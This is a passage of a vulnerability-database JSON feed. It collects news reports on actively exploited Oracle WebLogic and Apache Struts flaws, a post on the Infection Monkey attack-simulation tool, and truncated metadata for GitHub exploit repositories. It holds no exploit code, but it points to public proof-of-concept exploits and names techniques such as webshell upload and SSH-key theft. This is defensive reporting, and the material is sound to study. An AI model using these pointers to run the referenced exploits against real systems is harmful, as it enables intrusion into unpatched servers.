reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>).\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. The server has a remote code execution flaw, CVE-2020-2883, that can be exploited by unauthenticated attackers to take over unpatched systems.\n\nEric Maurice, director of security assurance, said [in a post last week](<https://blogs.oracle.com/security/apply-april-2020-cpu>) that the flaw was addressed in [Oracle\u2019s April 2020 Critical Patch Update](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>), which fixed 405 flaws, including 286 that were remotely exploitable across nearly two dozen product lines.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches,\u201d according to Oracle\u2019s security update. \u201cIn some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.\u201d\n\nShortly before Oracle\u2019s warning of the active exploits, proof of concept exploit code [was also published](<https://github.com/hktalent/CVE_2020_2546>) by a researcher (under the alias \u201chktalent\u201d) on GitHub for the flaw last week.\n\nAccording to Trend Micro\u2019s Zero Day Initiative, the flaw [ranks 9.8 out of 10](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2883>) on the CVSSv3 scale, making it critical severity. Two variants of the flaw were reported. The [first variant of the flaw](<https://www.zerodayinitiative.com/advisories/ZDI-20-504/>) exists within the handling of the T3 protocol, which is used to transport information between WebLogic servers and other types of Java programs. According to ZDI, crafted data in a T3 protocol message can trigger the deserialization of untrusted data \u2013 allowing an attacker to execute code in the context of the current process.\n\nThe second variant of the flaw exists within [the Oracle Coherence library](<https://www.zerodayinitiative.com/advisories/ZDI-20-570/>), Oracle\u2019s in-memory data grid and distributed caching solution.\n\n\u201cThe issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data,\u201d according to ZDI. \u201cAn attacker can leverage this vulnerability to execute code in the context of the service account.\u201d\n\nAffected versions of WebLogic Server include versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.\n\nOracle did not disclose further details about how many were targeted or the attackers behind the hacks.\n\nOracle WebLogic servers continue to be hard hit with exploits. In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-04T14:57:51", "type": "threatpost", "title": "Oracle: Unpatched Versions of WebLogic App Server Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-2883"], "modified": "2020-05-04T14:57:51", "id": "THREATPOST:15EF9F86D0EEBCD1CD450BF55954D1D2", "href": "https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-29T22:18:34", "description": "If an organization hasn\u2019t updated their Oracle WebLogic servers to protect them against a recently disclosed RCE flaw, researchers have a dire warning: \u201cAssume it has been compromised.\u201d\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. The console component of the WebLogic Server has a flaw, CVE-2020-14882, which ranks 9.8 out of 10 on the CVSS scale. According to Oracle, the attack is \u201clow\u201d in complexity, requires no privileges and no user interaction and can be exploited by attackers with network access via HTTP.\n\nThe flaw was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe October update was released Oct. 21. Fast forward to this week, Johannes B. Ullrich, dean of research at the SANS Technology Institute, said on Thursday that based on honeypot observations, cybercriminals are now actively targeting the flaw.\n\n\u201cAt this point, we are seeing the scans slow down a bit,\u201d said Ullrich [in a Thursday post](<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/>). \u201cBut they have reached \u2018saturation\u2019 meaning that all IPv4 addresses have been scanned for this vulnerability. If you find a vulnerable server in your network: Assume it has been compromised.\u201d\n\nUllrich said, the exploits appear to be based on a Wednesday blog post published (in Vietnamese) by \u201cJang,\u201d who described how to leverage the flaw to achieve remote code execution via only one GET request. Below is a proof of concept (POC) video.\n\nUllrich said, exploit attempts on the honeypots so far originate from four IP addresses: 114.243.211.182, 139.162.33.228, 185.225.19.240 and 84.17.37.239.\n\nUllrich[ and others](<https://twitter.com/GossiTheDog/status/1321430443611328513>) are urging Oracle WebLogic Server users to update their systems as soon as possible. Users can find a patch availability document for WebLogic and other vulnerable Oracle products, [available here](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html>).\n\n> One for detection peeps. This Oracle WebLogic bug will get abused, pre-auth RCE via a POST request. <https://t.co/y6huXWUuS0>\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [October 28, 2020](<https://twitter.com/GossiTheDog/status/1321430443611328513?ref_src=twsrc%5Etfw>)\n\nOracle WebLogic servers continue to be hard hit with exploits. In May 2020, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T14:49:58", "type": "threatpost", "title": "Oracle WebLogic Server RCE Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-14882"], "modified": "2020-10-29T14:49:58", "id": "THREATPOST:4844442F117316BC8EEC54269FACDAA8", "href": "https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-31T21:54:31", "description": "Oracle said that a critical remote code execution flaw in its WebLogic Server is being actively exploited in the wild.\n\nThe remote code execution flaw ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) impacts a number of versions of Oracle\u2019s WebLogic Server, used for building and deploying enterprise applications. The vulnerability has a CVSS score of 9.8 out of 10. Part of its seriousness is because it is remotely exploitable without authentication.\n\n\u201cDue to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible,\u201d according to Oracle\u2019s Tuesday [security advisory.](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe issue stems from a deserialization vulnerability in the XMLDecoder in Oracle\u2019s WebLogic Server web services. The XMLDecoder class is used to read XML documents created using the XMLEncoder according to Oracle.\n\nImpacted are Oracle WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0.\n\nResearchers with KnownSec 404 said the vulnerability bypasses a fix for an infamous Oracle WebLogic Server deserialization flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), which was disclosed earlier this year and patched on April 26.\n\n\u201cA new oracle webLogic deserialization RCE 0day vulnerability was found and is being actively used in the wild.We analyzed and reproduced the 0day vulnerability, which is based on and bypasses the patch for CVE-2019\u20132725,\u201d researchers said in an analysis [over the weekend](<https://medium.com/@knownsec404team/knownsec-404-team-alert-again-cve-2019-2725-patch-bypassed-32a6a7b7ca15?postPublishedType=repub>).\n\nHowever, John Heimann, vice president security program management shut down researchers\u2019 claims that the newly-disclosed flaw is related to CVE-2019\u20132725, saying the two are unrelated: \u201cPlease note that while the issue addressed by this alert is a deserialization vulnerability, like that addressed in Security Alert CVE-2019-2725, it is a distinct vulnerability,\u201d he said in [a Tuesday security alert](<https://blogs.oracle.com/security/security-alert-cve-2019-2729-released>).\n\nNeither Oracle nor KnownSec 404 have responded to requests for comment regarding the two contradicting reports.\n\nRegardless, researchers with KnownSec 404, who are credited (among others) for discovering the flaw, said that they have seen the vulnerability being actively exploited in the wild, and warned users to update.\n\n> [#Oracle](<https://twitter.com/hashtag/Oracle?src=hash&ref_src=twsrc%5Etfw>) [#WebLogic](<https://twitter.com/hashtag/WebLogic?src=hash&ref_src=twsrc%5Etfw>) Deserialization RCE Vulnerability (0day) Alert Again (CVE-2019\u20132725 patch bypassed\u203c\ufe0f) Check out the temporary solution offered by KnownSec 404 Team:<https://t.co/1jOYrnysFy>\n> \n> \u2014 Seebug (@seebug_team) [June 15, 2019](<https://twitter.com/seebug_team/status/1139924754759131136?ref_src=twsrc%5Etfw>)\n\nCritical flaws in Oracle WebLogic Servers continue to be a thorn in the security community\u2019s side.\n\nResearchers said that attackers have been exploiting the older deserialization flaw, CVE-2019\u20132725, since April 21 in malicious campaigns revolving around the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>), [a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, and [GandCrab ransomware](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>).\n\nThe sheer number of vulnerable devices and exploit attempts around this flaw show how serious it is: A scan in May showed more than 41,000 publicly accessible WebLogic instances in the wild, while Palo Alto Networks said that they detected over 600 exploitation attempts targeting CVE-2019-2725.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=ART>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts from Malwarebytes, Recorded Future and Moss Adams as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-19T16:25:30", "type": "threatpost", "title": "Oracle Warns of New Actively-Exploited WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-9586"], "modified": "2019-06-19T16:25:30", "id": "THREATPOST:E415CA5BCD7AC520A44AB5246664528A", "href": "https://threatpost.com/oracle-warns-of-new-actively-exploited-weblogic-flaw/145829/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. \n[](<https://threatpost.com/newsletter-sign/>) \nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing &amp; Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut\u2019s Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "pentestit": [{"lastseen": "2018-12-03T23:18:27", "description": "PenTestIT RSS Feed\n\nI'm sure you must have read my previous post title the [List of Adversary Emulation Tools](<http://pentestit.com/adversary-emulation-tools-list/>). In that post, I briefly mentioned about the Guardicore Infection Monkey. Good news now is that it has been updated! We now have **Infection Monkey 1.6.1**. An important change about this version is that this is an AWS only version.\n\n[](< http://pentestit.com/update-infection-monkey-1-6-1/>) \n\n\nWhat is Infection Monkey?\n\n> The Infection Monkey is an open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. It operates in much the same way a real attacker would - starting from a random location in the network and propagating from there, while looking for all possible paths of exploitation.\n\n## Infection Monkey 1.6.1 Changes:\n\nInfection Monkey 1.6.1 has now been integrated with the AWS Security Hub. This allows anyone to verify and test the resilience of their AWS environment and correlate this information with the native security solutions and benchmark score!\n\nAdditionally, I missed posting about another release - **Infection Monkey 1.6** which is also important. Hence, I'm posting about it here:\n\n## Infection Monkey 1.6 Change Log:\n\n**New Features:**\n\n * Detect cross segment traffic! The Monkey can now easily test whether two network segments are properly separated. PR [#120](<https://github.com/guardicore/monkey/pull/120>).\n * The Monkey can analyse your domain for possible Pass the Hash attacks. By cross referencing information collected by Mimikatz, the Monkey can now detect usage of identical passwords, cached logins with access to critical servers and more. [#170](<https://github.com/guardicore/monkey/pull/170>)\n * SSH key stealing. The monkey will now steal accessible SSH keys and use them when connecting to SSH servers, PR [#138](<https://github.com/guardicore/monkey/pull/138>).\n * Implement a cross platform attack for [Struts2 Multi-part file upload vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-045>), PR [#179](<https://github.com/guardicore/monkey/pull/179>).\n * Implement a cross platform attack for Oracle Web Logic CVE-2017-10271, PR [#180](<https://github.com/guardicore/monkey/pull/180>).\n * ElasticGroovy attack now supports Windows victims, PR [#181](<https://github.com/guardicore/monkey/pull/181>).\n * Hadoop cluster RCE - Abuse unauthenticated access to YARN resource manager, PR [#182](<https://github.com/guardicore/monkey/pull/182>).\n\n**Code improvements:**\n\n * We've refactored the codebase, so now it's easier to share code between the Monkey and the Monkey Island components. PR [#145](<https://github.com/guardicore/monkey/pull/145>).\n * Mimikatz is now bundled into a password protected ZIP file and extracted only if required. Makes deployment easier with AV software. PR [#169](<https://github.com/guardicore/monkey/pull/169>).\n * Monkey Island now properly logs itself to a file and console. So if you got bugs, it'll now be easier to figure them out. PR [#139](<https://github.com/guardicore/monkey/pull/139>).\n * Systemd permissions are now properly locked down\n * Fixed a situation where a successful shellshock attack could freeze the attacking Monkey. [#200](<https://github.com/guardicore/monkey/pull/200>)\n\nIn other words, the Monkey can now detect potential attack paths between computers within the same domain or workgroup using credentials reuse, pass-the-hash technique and cached logins. In addition to the already existing attacks, Infection Monkey 1.6.1 now includes support for the Struts2 Multipart file upload vulnerability (CVE-2017-5638), Oracle WebLogic Server WLS Security component vulnerability (CVE-2017-10271), Elasticsearch Groovy attack (CVE 2015-1427) &amp; the Hadoop YARN Resource Manager remote code execution vulnerability.\n\nLot's of exciting stuff from the guys at Guardicore Labs. Really good work!\n\n## Download Infection Monkey 1.6.1:\n\nThe following Infection Monkey 1.6.1 files are available for download:\n\n 1. infection_monkey_1.6.1_AWS_only.zip\n 2. infection_monkey_1.6.1_AWS_only.tar.gz\n\nGet them **[here](<https://github.com/guardicore/monkey/releases/tag/infection_monkey_1.6.1_AWS_only>)**.\n\nThe post [UPDATE: Infection Monkey 1.6.1](<http://pentestit.com/update-infection-monkey-1-6-1/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2018-12-03T22:28:53", "type": "pentestit", "title": "UPDATE: Infection Monkey 1.6.1", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-12-03T22:28:53", "id": "PENTESTIT:F5DFB26B34C75683830E664CBD58178F", "href": "http://pentestit.com/update-infection-monkey-1-6-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "githubexploit": [{"lastseen": "2021-12-29T23:35:43", "description": "# CVE-2019-2725\nWebLogic Universal Exploit - CVE-2017-3506 / CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-23T01:42:57", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2017-10271", "CVE-2017-3506"], "modified": "2021-12-29T12:52:27", "id": "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:26:46", "description": "# CVE-2019-2725-POC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-12T03:09:23", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-12-12T03:11:14", "id": "20E0E007-A9C4-58EA-917F-E225D8785B3F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-04T17:42:51", "description": "# CVE-2019-2725\n\nCVE-2019-2725(CNVD-C-2019-48814\u3001WebLogic wls9-a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-29T01:57:05", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-08-04T07:47:37", "id": "24A6D0CC-8F53-539E-8FBC-D5222C4BC565", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T23:29:01", "description": "# Oracle-WLS-Weblogic-RCE\n(CVE-2019-2725) Oracle WLS(Weblogic) R...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-31T14:09:09", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2020-11-07T13:04:21", "id": "62E1CDF6-537F-52B5-8ACE-87CDDFB3544D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T19:21:36", "description": "# CVE-2019-2725\n# weblogic\u547d\u4ee4\u56de\u663e+webshell\u4e0a\u4f20<br/>\n**\u514d\u8d23\u58f0\u660e:\u672c\u5de5\u5177\u4ec5\u4f9b\u5b89\u5168\u6d4b\u8bd5\u5b66...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-10T05:12:44", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-08-15T15:41:28", "id": "96B2FD46-0F7E-5581-BBA6-E4A48966E225", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:52:52", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 